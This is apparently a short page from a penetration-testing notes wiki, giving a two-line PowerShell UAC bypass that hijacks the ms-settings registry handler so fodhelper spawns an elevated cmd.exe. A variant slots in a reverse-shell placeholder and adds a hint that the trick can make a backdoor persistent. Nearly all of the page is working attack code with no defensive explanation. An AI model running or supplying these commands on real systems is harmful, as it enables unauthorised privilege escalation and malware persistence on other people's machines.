UAC bypass

UAC bypass in 2 lines

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
cmd -> fodhelper

Spaw anything:
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value 'your-reverse-shell' -Force

Hint: You can use this to make your shellcode/backdoor persistent!

UAC Bypass – FodhelperPenetration Testing Lab

UACPuckieStyle

PreviousResources NextProcess migration like meterpreter

Last updated 3 years ago